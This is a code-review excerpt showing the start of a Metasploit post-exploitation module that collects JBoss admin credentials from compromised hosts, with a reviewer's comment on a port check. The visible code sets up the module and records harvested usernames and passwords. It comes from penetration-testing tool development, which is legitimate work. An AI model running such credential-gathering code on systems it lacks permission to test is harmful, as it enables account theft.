modules/post/multi/gather/jboss_gather.rb

```diff
@@ -0,0 +1,266 @@
+require 'msf/core'
+require 'nokogiri'
+
+class MetasploitModule < Msf::Post
+    include Msf::Post::File
+    include Msf::Post::Linux::System
+
+    def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Jboss Credential Collector',
+        'Description'   => %q{
+          This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
+        'Platform'      => [ 'linux', 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+    ))
+    end
+
+    def report_creds(user, pass, port)
+        return if (user.empty? or pass.empty?)
+            # Assemble data about the credential objects we will be creating
+            credential_data = {
+                origin_type: :session,
+                post_reference_name: self.fullname,
+                private_data: pass,
+                private_type: :password,
+                session_id: session_db_id,
+                username: user,
+                workspace_id: myworkspace_id,
+            }
+
+            credential_core = create_credential(credential_data)
+
+            if not port.is_a? Integer
+                print_status("Port not an Integer, Something probably went wrong")
+                port = 8080
+            end
```

Comment:
Checking if a port is an integer inside `report_creds` is also weird. You shouldn't need to do this anyway - framework should handle this.